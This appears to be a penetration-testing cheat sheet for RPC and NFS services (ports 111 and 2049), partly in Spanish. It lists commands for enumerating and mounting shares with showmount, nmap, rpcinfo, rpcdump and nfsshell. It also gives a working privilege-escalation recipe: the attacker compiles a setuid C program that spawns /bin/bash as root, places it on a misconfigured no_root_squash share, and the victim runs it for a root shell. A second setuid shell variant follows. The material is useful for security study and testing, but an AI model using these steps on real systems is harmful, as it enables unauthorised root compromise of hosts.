😎Port 111-2049 (RPC/NFS)

Network file sharing(nfs)

Show Mountable NFS Shares

showmount -e <IP>
nmap --script=nfs-showmount -oN mountable_shares <IP>

Mount a share

sudo mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
sudo mount -v -t nfs -o vers=2 <IP>:<SHARE> <DIRECTORY>

NFS misconfigurations

# List exported shares
cat /etc/exports

If you find some directory that is configured as no_root_squash/no_all_squash you may be able to privesc.

# Attacker, as root user

mkdir <DIRECTORY>
mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
cd <DIRECTORY>
echo 'int main(void){setreuid(0,0); system("/bin/bash"); return 0;}' > pwn.c
gcc pwn.c -o pwn
chmod +s pwn

# Victim

cd <SHARE>
./pwn # Root shell

scan

showmount -e someexample.com

rpcinfo 111

installation

apt-get install rpcbind

apt-get install nfs-common

rpcinfo -p IP_Address

rpcdump

by impacket

rpcdump.py 10.10.xx.xx

nmap

nmap -Pn -sV -script=nfs*

mount the nfs

mount  -o nolock <ip>:/path_remote   /path/local

$ mkdir backup
$ mount -o ro,noexec someexample.com:/backup backup
$ ls backup
backup.tar.bz2.zip

$ mount -t nfs someexample.com:/backup backup

vulnerabilidad

chequear “/etc/exports” si tiene no_root_squash o no_all_squash y tenemos permisos de escritura se puede crear un ejecutable con setuid ej:

int main(void) {
setgid(0); setuid(0);
execl(“/bin/sh”,”sh”,0); }

chown root.root ./pwnme
chmod u+s ./pwnme

nfshell

• install https://github.com/NetDirect/nfsshell

  root@kali:~/Downloads/nfsshell-master# apt-get install libreadline-dev libncurses5-dev
  root@kali:~/Downloads/nfsshell-master# make

• use

  root@kali:~# nfsshell
  nfs> host 10.10.10.34
  nfs> export
  nfs> mount /loquefuere